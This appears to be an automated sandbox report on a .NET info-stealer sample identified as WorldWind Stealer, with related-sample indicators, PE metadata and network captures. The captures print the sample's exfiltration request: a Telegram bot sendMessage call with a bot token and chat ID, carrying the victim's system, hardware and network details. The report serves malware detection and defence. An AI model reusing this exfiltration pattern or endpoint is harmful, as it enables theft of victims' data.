Number of analysed new started processes analysed:	24
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	JGvCEaqruI.exe renamed because original name is a hash value
Original Sample Name:	5fe6e19d2d832aa15fbad4b015f118e0915ee904c4c0db8f58b9af90ce011513.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@19/139@5/4
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 154 Number of non-executed functions: 12
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 184.28.90.27, 13.107.246.45, 172.202.163.200
Excluded domains from analysis (whitelisted): fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtQueryVolumeInformationFile calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
19:12:30	API Interceptor	8455865x Sleep call for process: JGvCEaqruI.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.44.66	cOH7jKmo25.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse
	FUEvp5c8lO.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse
	i8Vwc7iOaG.exe	Get hash	malicious	LummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, StormKitty, Vidar	Browse
	client2.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse
	WinRAR 7.01 Pro.exe	Get hash	malicious	PureLog Stealer, WorldWind Stealer	Browse
	PasteHook.exe	Get hash	malicious	AsyncRAT, DCRat, StormKitty, WorldWind Stealer, Xmrig	Browse
	viVOqZjAT0.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse
	Kh7W85ONS7.exe	Get hash	malicious	AsyncRAT, DarkTortilla, StormKitty, WorldWind Stealer	Browse
	zrrHgsDzgS.exe	Get hash	malicious	AsyncRAT, PureLog Stealer, StormKitty, WorldWind Stealer, zgRAT	Browse
	H1XdsfkcgU.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse
149.154.167.220	TjoY7n65om.exe	Get hash	malicious	Snake Keylogger	Browse
	Kb94RzMYNf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	WGi85dsMNp.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	cOH7jKmo25.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse
	3i1gMM8K4z.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	2NJzy3tiny.exe	Get hash	malicious	MassLogger RAT	Browse
	z87sammylastborn.exe	Get hash	malicious	MassLogger RAT	Browse
	vnV17JImCH.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	czHx16QwGQ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	6cicUo3f8g.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
104.16.185.241	6mllsKaB2q.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	icanhazip.com/
	bc7EKCf.exe	Get hash	malicious	StormKitty	Browse	icanhazip.com/
	CVmkXJ7e0a.exe	Get hash	malicious	SheetRat	Browse	icanhazip.com/
	file.exe	Get hash	malicious	Amadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, StormKitty, VenomRAT	Browse	icanhazip.com/
	file.exe	Get hash	malicious	Amadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, VenomRAT, Vidar	Browse	icanhazip.com/
	iGxCM2I5u9.exe	Get hash	malicious	Flesh Stealer	Browse	icanhazip.com/
	3K5MXGVOJE.exe	Get hash	malicious	Unknown	Browse	icanhazip.com/
	K6aOw2Jmji.exe	Get hash	malicious	Stealerium	Browse	icanhazip.com/
	jpiWvvEcbp.exe	Get hash	malicious	Stealerium	Browse	icanhazip.com/
	VzhY4BcvBH.exe	Get hash	malicious	AsyncRAT, RedLine, StormKitty, VenomRAT	Browse	icanhazip.com/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
api.mylnikov.org	cOH7jKmo25.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	104.21.44.66
	FUEvp5c8lO.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	104.21.44.66
	6mllsKaB2q.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	172.67.196.114
	Invoice-BL. Payment TT $ 28,945.99.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	172.67.196.114
	file.exe	Get hash	malicious	Amadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, StormKitty, VenomRAT	Browse	172.67.196.114
	file.exe	Get hash	malicious	Amadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, VenomRAT, Vidar	Browse	172.67.196.114
	VzhY4BcvBH.exe	Get hash	malicious	AsyncRAT, RedLine, StormKitty, VenomRAT	Browse	172.67.196.114
	d29z3fwo37.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	172.67.196.114
	client.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	172.67.196.114
	BTC.exe	Get hash	malicious	AsyncRAT, Rezlt, StormKitty, VenomRAT, Vermin Keylogger, WorldWind Stealer, XWorm	Browse	172.67.196.114
api.telegram.org	TjoY7n65om.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	Kb94RzMYNf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	WGi85dsMNp.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	cOH7jKmo25.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	149.154.167.220
	3i1gMM8K4z.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	2NJzy3tiny.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	z87sammylastborn.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	vnV17JImCH.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	czHx16QwGQ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	6cicUo3f8g.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
icanhazip.com	cOH7jKmo25.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	104.16.184.241
	FUEvp5c8lO.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	104.16.184.241
	6mllsKaB2q.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	104.16.185.241
	bc7EKCf.exe	Get hash	malicious	StormKitty	Browse	104.16.185.241
	Invoice-BL. Payment TT $ 28,945.99.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	104.16.184.241
	bPkG0wTVon.exe	Get hash	malicious	Unknown	Browse	104.16.184.241
	zyEDYRU0jw.exe	Get hash	malicious	Arcane	Browse	104.16.184.241
	zyEDYRU0jw.exe	Get hash	malicious	Arcane	Browse	104.16.184.241
	itLDZwgFNE.exe	Get hash	malicious	Flesh Stealer	Browse	104.16.184.241
	3gJQoqWpxb.bat	Get hash	malicious	Unknown	Browse	104.16.184.241

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	TjoY7n65om.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	Kb94RzMYNf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	WGi85dsMNp.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	cOH7jKmo25.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	149.154.167.220
	3i1gMM8K4z.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	2NJzy3tiny.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	z87sammylastborn.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	vnV17JImCH.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	czHx16QwGQ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	6cicUo3f8g.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
CLOUDFLARENETUS	h1HIe1rt4D.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.96.1
	http://unikuesolutions.com/ck/bd/%7BRANDOM_NUMBER05%7D/YmVuc29uLmxpbkB2aGFjb3JwLmNvbQ==	Get hash	malicious	Unknown	Browse	104.17.25.14
	http://txto.eu.org/	Get hash	malicious	Unknown	Browse	104.21.16.1
	ru52XOQ1p7.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	tVuAoupHhZ.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.32.1
	TjoY7n65om.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.80.1
	phish_alert_sp2_2.0.0.0(4).eml	Get hash	malicious	Unknown	Browse	172.66.0.227
	https://app.online.mt.com/e/es?s=961579678&e=14507707&elqTrackId=4f40dcb3a3854013ad3a46d461cc3aff&elq=5140e028df1a42afab491350388fd129&elqaid=221811&elqat=1&elqcst=272&elqcsid=2325629&elqak=8AF5D97DFF9E423CC7C7524F5CA3C1A86F5F67341B9DF612D5A2FB20DE928F2AA351	Get hash	malicious	Unknown	Browse	172.66.0.227
	https://app.online.mt.com/e/es?s=961579678&e=14507707&elqTrackId=4f40dcb3a3854013ad3a46d461cc3aff&elq=5140e028df1a42afab491350388fd129&elqaid=221811&elqat=1&elqcst=272&elqcsid=2325629&elqak=8AF5D97DFF9E423CC7C7524F5CA3C1A86F5F67341B9DF612D5A2FB20DE928F2AA351	Get hash	malicious	Unknown	Browse	172.66.0.227
	https://maya-lopez.filemail.com/t/XhcWEjoR	Get hash	malicious	Unknown	Browse	188.114.96.3
CLOUDFLARENETUS	http://unikuesolutions.com/ck/bd/%7BRANDOM_NUMBER05%7D/YmVuc29uLmxpbkB2aGFjb3JwLmNvbQ==	Get hash	malicious	Unknown	Browse	188.114.97.3
	h1HIe1rt4D.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.96.1
	http://unikuesolutions.com/ck/bd/%7BRANDOM_NUMBER05%7D/YmVuc29uLmxpbkB2aGFjb3JwLmNvbQ==	Get hash	malicious	Unknown	Browse	104.17.25.14
	http://txto.eu.org/	Get hash	malicious	Unknown	Browse	104.21.16.1
	ru52XOQ1p7.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	tVuAoupHhZ.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.32.1
	TjoY7n65om.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.80.1
	phish_alert_sp2_2.0.0.0(4).eml	Get hash	malicious	Unknown	Browse	172.66.0.227
	https://app.online.mt.com/e/es?s=961579678&e=14507707&elqTrackId=4f40dcb3a3854013ad3a46d461cc3aff&elq=5140e028df1a42afab491350388fd129&elqaid=221811&elqat=1&elqcst=272&elqcsid=2325629&elqak=8AF5D97DFF9E423CC7C7524F5CA3C1A86F5F67341B9DF612D5A2FB20DE928F2AA351	Get hash	malicious	Unknown	Browse	172.66.0.227
	https://app.online.mt.com/e/es?s=961579678&e=14507707&elqTrackId=4f40dcb3a3854013ad3a46d461cc3aff&elq=5140e028df1a42afab491350388fd129&elqaid=221811&elqat=1&elqcst=272&elqcsid=2325629&elqak=8AF5D97DFF9E423CC7C7524F5CA3C1A86F5F67341B9DF612D5A2FB20DE928F2AA351	Get hash	malicious	Unknown	Browse	172.66.0.227

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	J4CcLMNm55.exe	Get hash	malicious	Unknown	Browse	104.21.44.66 149.154.167.220
	J4CcLMNm55.exe	Get hash	malicious	Unknown	Browse	104.21.44.66 149.154.167.220
	ru52XOQ1p7.exe	Get hash	malicious	AgentTesla	Browse	104.21.44.66 149.154.167.220
	TjoY7n65om.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.44.66 149.154.167.220
	Kb94RzMYNf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.44.66 149.154.167.220
	WGi85dsMNp.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.44.66 149.154.167.220
	4z8Td6Kv8R.exe	Get hash	malicious	Unknown	Browse	104.21.44.66 149.154.167.220
	4z8Td6Kv8R.exe	Get hash	malicious	Unknown	Browse	104.21.44.66 149.154.167.220
	cOH7jKmo25.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	104.21.44.66 149.154.167.220
	3i1gMM8K4z.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	104.21.44.66 149.154.167.220

Process:	C:\Users\user\Desktop\JGvCEaqruI.exe
File Type:	very short file (no magic)
Category:	modified
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:V:V
MD5:	CFCD208495D565EF66E7DFF9F98764DA
SHA1:	B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
SHA-256:	5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
SHA-512:	31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
Malicious:	false
Reputation:	high, very likely benign file
Preview:	0

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	6.7986327061412295
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	JGvCEaqruI.exe
File size:	933'888 bytes
MD5:	fef7aab8bbb6e60534edc8db7aaff00a
SHA1:	399d65a862501cdcd32983425efc1a99b85f953e
SHA256:	5fe6e19d2d832aa15fbad4b015f118e0915ee904c4c0db8f58b9af90ce011513
SHA512:	5b3395c131afd4c73d02b1c95397187fc78d62e393872b776d0edef8471041a91d424a17bfde311801b83eb56c0457aaaa9758d0112347d9bce2af1ff2bfaaa3
SSDEEP:	12288:av8DWIoShwKj64KBRzeFKjQlGHIvGFJbnKy0FClmRk3yB:k86IoBCmBQFKjkGHIvGqXYykiB
TLSH:	7815A43C497D12EBC0A6C7ADCBE89827B604A96F7150ADA494D257A53313F4B34C363E
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0.............f.... ........@.. ....................................@................................

Entrypoint:	0x4dd766
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xD6E4B608 [Fri Mar 31 03:50:32 2084 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xdd714	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xde000	0x82ec	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xe8000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xdbec4	0x70	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xdb76c	0xdb800	dd0a1cff7a880b0bae1a0344a1c6c702	False	0.659913777761959	data	6.7712707587465655	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xde000	0x82ec	0x8400	a7525ea8fb5360ee45447bc4e8e035bd	False	0.5306877367424242	data	6.370146985088134	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xe8000	0xc	0x200	61241b62e0103aa55387753ff026852c	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0xde1f0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 5669 x 5669 px/m	0.36436170212765956
RT_ICON	0xde658	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304, resolution 5669 x 5669 px/m	0.24385245901639344
RT_ICON	0xdefe0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 5669 x 5669 px/m	0.1845684803001876
RT_ICON	0xe0088	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 5669 x 5669 px/m	0.13526970954356846
RT_ICON	0xe2630	0x3750	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.9771186440677966
RT_GROUP_ICON	0xe5d80	0x4c	data	0.75
RT_VERSION	0xe5dcc	0x334	data	0.4378048780487805
RT_MANIFEST	0xe6100	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2025 01:12:48.086544991 CET	49752	80	192.168.2.7	104.16.185.241
Jan 11, 2025 01:12:48.091398954 CET	80	49752	104.16.185.241	192.168.2.7
Jan 11, 2025 01:12:48.091618061 CET	49752	80	192.168.2.7	104.16.185.241
Jan 11, 2025 01:12:48.092483044 CET	49752	80	192.168.2.7	104.16.185.241
Jan 11, 2025 01:12:48.097284079 CET	80	49752	104.16.185.241	192.168.2.7
Jan 11, 2025 01:12:48.581324100 CET	80	49752	104.16.185.241	192.168.2.7
Jan 11, 2025 01:12:48.640439987 CET	49752	80	192.168.2.7	104.16.185.241
Jan 11, 2025 01:12:48.649975061 CET	49759	443	192.168.2.7	104.21.44.66
Jan 11, 2025 01:12:48.650022984 CET	443	49759	104.21.44.66	192.168.2.7
Jan 11, 2025 01:12:48.650315046 CET	49759	443	192.168.2.7	104.21.44.66
Jan 11, 2025 01:12:48.656719923 CET	49759	443	192.168.2.7	104.21.44.66
Jan 11, 2025 01:12:48.656739950 CET	443	49759	104.21.44.66	192.168.2.7
Jan 11, 2025 01:12:49.133900881 CET	443	49759	104.21.44.66	192.168.2.7
Jan 11, 2025 01:12:49.133970022 CET	49759	443	192.168.2.7	104.21.44.66
Jan 11, 2025 01:12:49.136821985 CET	49759	443	192.168.2.7	104.21.44.66
Jan 11, 2025 01:12:49.136827946 CET	443	49759	104.21.44.66	192.168.2.7
Jan 11, 2025 01:12:49.137056112 CET	443	49759	104.21.44.66	192.168.2.7
Jan 11, 2025 01:12:49.183361053 CET	49759	443	192.168.2.7	104.21.44.66
Jan 11, 2025 01:12:49.231323957 CET	443	49759	104.21.44.66	192.168.2.7
Jan 11, 2025 01:12:49.300492048 CET	443	49759	104.21.44.66	192.168.2.7
Jan 11, 2025 01:12:49.300561905 CET	443	49759	104.21.44.66	192.168.2.7
Jan 11, 2025 01:12:49.300628901 CET	49759	443	192.168.2.7	104.21.44.66
Jan 11, 2025 01:12:49.355403900 CET	49759	443	192.168.2.7	104.21.44.66
Jan 11, 2025 01:12:49.359728098 CET	49752	80	192.168.2.7	104.16.185.241
Jan 11, 2025 01:12:49.364804983 CET	80	49752	104.16.185.241	192.168.2.7
Jan 11, 2025 01:12:49.364861965 CET	49752	80	192.168.2.7	104.16.185.241
Jan 11, 2025 01:12:49.367050886 CET	49766	443	192.168.2.7	149.154.167.220
Jan 11, 2025 01:12:49.367104053 CET	443	49766	149.154.167.220	192.168.2.7
Jan 11, 2025 01:12:49.367170095 CET	49766	443	192.168.2.7	149.154.167.220
Jan 11, 2025 01:12:49.367535114 CET	49766	443	192.168.2.7	149.154.167.220
Jan 11, 2025 01:12:49.367552042 CET	443	49766	149.154.167.220	192.168.2.7
Jan 11, 2025 01:12:49.976635933 CET	443	49766	149.154.167.220	192.168.2.7
Jan 11, 2025 01:12:49.976767063 CET	49766	443	192.168.2.7	149.154.167.220
Jan 11, 2025 01:12:50.056961060 CET	49766	443	192.168.2.7	149.154.167.220
Jan 11, 2025 01:12:50.057008028 CET	443	49766	149.154.167.220	192.168.2.7
Jan 11, 2025 01:12:50.057362080 CET	443	49766	149.154.167.220	192.168.2.7
Jan 11, 2025 01:12:50.134727001 CET	49766	443	192.168.2.7	149.154.167.220
Jan 11, 2025 01:12:50.134880066 CET	443	49766	149.154.167.220	192.168.2.7
Jan 11, 2025 01:12:50.601576090 CET	443	49766	149.154.167.220	192.168.2.7
Jan 11, 2025 01:12:50.601655960 CET	443	49766	149.154.167.220	192.168.2.7
Jan 11, 2025 01:12:50.601722002 CET	49766	443	192.168.2.7	149.154.167.220
Jan 11, 2025 01:12:50.604397058 CET	49766	443	192.168.2.7	149.154.167.220
Jan 11, 2025 01:12:50.612679005 CET	49772	443	192.168.2.7	149.154.167.220
Jan 11, 2025 01:12:50.612720966 CET	443	49772	149.154.167.220	192.168.2.7
Jan 11, 2025 01:12:50.612790108 CET	49772	443	192.168.2.7	149.154.167.220
Jan 11, 2025 01:12:50.613085032 CET	49772	443	192.168.2.7	149.154.167.220
Jan 11, 2025 01:12:50.613095045 CET	443	49772	149.154.167.220	192.168.2.7
Jan 11, 2025 01:12:51.236211061 CET	443	49772	149.154.167.220	192.168.2.7
Jan 11, 2025 01:12:51.245388031 CET	49772	443	192.168.2.7	149.154.167.220
Jan 11, 2025 01:12:51.245408058 CET	443	49772	149.154.167.220	192.168.2.7
Jan 11, 2025 01:12:51.698451042 CET	443	49772	149.154.167.220	192.168.2.7
Jan 11, 2025 01:12:51.698523045 CET	443	49772	149.154.167.220	192.168.2.7
Jan 11, 2025 01:12:51.698816061 CET	49772	443	192.168.2.7	149.154.167.220
Jan 11, 2025 01:12:51.699856043 CET	49772	443	192.168.2.7	149.154.167.220

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2025 01:12:47.937585115 CET	63998	53	192.168.2.7	1.1.1.1
Jan 11, 2025 01:12:47.946006060 CET	53	63998	1.1.1.1	192.168.2.7
Jan 11, 2025 01:12:48.074311018 CET	61759	53	192.168.2.7	1.1.1.1
Jan 11, 2025 01:12:48.081234932 CET	53	61759	1.1.1.1	192.168.2.7
Jan 11, 2025 01:12:48.640039921 CET	63916	53	192.168.2.7	1.1.1.1
Jan 11, 2025 01:12:48.649127960 CET	53	63916	1.1.1.1	192.168.2.7
Jan 11, 2025 01:12:49.359483957 CET	57747	53	192.168.2.7	1.1.1.1
Jan 11, 2025 01:12:49.366417885 CET	53	57747	1.1.1.1	192.168.2.7
Jan 11, 2025 01:13:02.797945976 CET	50666	53	192.168.2.7	1.1.1.1
Jan 11, 2025 01:13:02.805016041 CET	53	50666	1.1.1.1	192.168.2.7

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:12:48.092483044 CET	63	OUT	GET / HTTP/1.1 Host: icanhazip.com Connection: Keep-Alive
Jan 11, 2025 01:12:48.581324100 CET	535	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 00:12:48 GMT Content-Type: text/plain Content-Length: 13 Connection: keep-alive Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET Set-Cookie: __cf_bm=B4E.fofSZK.PusW0xqkTkm0VaIe69ndefw5eIWO9aQA-1736554368-1.0.1.1-6GfAwmB_I8wefFb_PvEcZx_nrtyg6dF6pQ4ZmgA45T7WckEIZJFJlEoVfsaYnNFd.X0fZ2TZNY70GMBYRkOvwg; path=/; expires=Sat, 11-Jan-25 00:42:48 GMT; domain=.icanhazip.com; HttpOnly Server: cloudflare CF-RAY: 9000b2831cd5727d-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39 0a Data Ascii: 8.46.123.189

Timestamp	Bytes transferred	Direction	Data
2025-01-11 00:12:49 UTC	112	OUT	GET /geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 HTTP/1.1 Host: api.mylnikov.org Connection: Keep-Alive
2025-01-11 00:12:49 UTC	1007	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 00:12:49 GMT Content-Type: application/json; charset=utf8 Content-Length: 88 Connection: close Access-Control-Allow-Origin: * Cache-Control: max-age=2678400 CF-Cache-Status: HIT Age: 21827 Last-Modified: Fri, 10 Jan 2025 18:09:02 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V4jY5GKezcCPSuCih%2Bnh7YAbDfS%2Bp6mI8UoGJhA6bnLA8x2LDGRewzIu14XTwGgkLY1NJ2%2FnN8bEpw8z%2FIUxIaCwfc9cJCC8bVqde7UupvPj2mdSah%2Fxz02BXKk4Zrg7gvZ5"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Strict-Transport-Security: max-age=0; preload X-Content-Type-Options: nosniff Server: cloudflare CF-RAY: 9000b287b86c0f5b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1482&min_rtt=1479&rtt_var=562&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2827&recv_bytes=726&delivery_rate=1936339&cwnd=221&unsent_bytes=0&cid=20710b86e0d81fa5&ts=176&x=0"
2025-01-11 00:12:49 UTC	88	IN	Data Raw: 7b 22 72 65 73 75 6c 74 22 3a 34 30 34 2c 20 22 64 61 74 61 22 3a 7b 7d 2c 20 22 6d 65 73 73 61 67 65 22 3a 36 2c 20 22 64 65 73 63 22 3a 22 4f 62 6a 65 63 74 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 22 2c 20 22 74 69 6d 65 22 3a 31 37 33 36 35 33 32 35 34 32 7d Data Ascii: {"result":404, "data":{}, "message":6, "desc":"Object was not found", "time":1736532542}

Timestamp	Bytes transferred	Direction	Data
2025-01-11 00:12:50 UTC	1681	OUT	GET /bot6331768257:AAE1Rrc3F4A-nTJkfXEukNBriTate8i72L8/sendMessage?chat_id=5287158069&text=%0A%20%20%F0%9F%8C%AA%20WorldWind%20Pro%20-%20Results:%0ADate:%202025-01-10%207:12:35%20pm%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20704672%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20Hardware:%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%207_PYFFT1V%0ARAM:%204095MB%0AHWID:%2028D2643902%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20Network:%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.189%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20Domains%20info:%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20Bank%20Logs%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20Crypto%20Logs%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20Freaky%20Logs%2 [TRUNCATED] Host: api.telegram.org Connection: Keep-Alive
